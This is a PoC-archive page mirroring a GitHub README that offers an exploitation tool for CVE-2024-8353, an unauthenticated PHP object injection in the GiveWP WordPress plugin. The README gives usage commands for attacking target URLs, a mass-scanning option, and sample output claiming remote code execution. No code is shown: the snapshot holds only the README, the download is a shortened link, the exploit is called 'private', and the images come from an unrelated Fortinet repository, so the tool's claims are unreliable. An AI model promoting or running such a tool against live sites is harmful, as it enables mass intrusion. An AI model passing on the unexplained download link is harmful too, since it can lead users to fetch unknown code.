Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-8353 PoC β€” GiveWP – Donation Plugin and Fundraising Platform <= 3.16.1 - Unauthenticated PHP Object Injection

Source
https://github.com/maybeheisenberg/CVE-2024-8353
Associated Vulnerability
Title:GiveWP – Donation Plugin and Fundraising Platform <= 3.16.1 - Unauthenticated PHP Object Injection (CVE-2024-8353)
Description:The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2.
Readme
## 🌟 Description
CVE-2024-8353
This vulnerability makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. 

## Details

- **CVE ID**: [CVE-2024-8353](https://nvd.nist.gov/vuln/detail/CVE-2024-8353)
- **Discovered**: 2024-09-27
- **Published**: 2024-09-28
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## βš™οΈ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/qs4XT)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-8353
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## πŸš€ Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```


### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-8353.
```

## πŸ“Š Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```


## πŸ“ˆ CVSS Information
Score: 10

Severity: CRITICAL

Confidentiality: High

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

![image](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE/assets/174053555/a5d4245a-f363-4eb2-a829-0316ab4e0d9d)
![image](https://github.com/CyberSecuritist/CVE-2024-21754-Forti-RCE/assets/174053555/88f234d8-9dc4-42cc-8b35-02a333ed2a7c)
File Snapshot

 [4.0K]  /data/pocs/f51c01c578e09c0c79636594e3fe189f794bfa37
└── [2.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’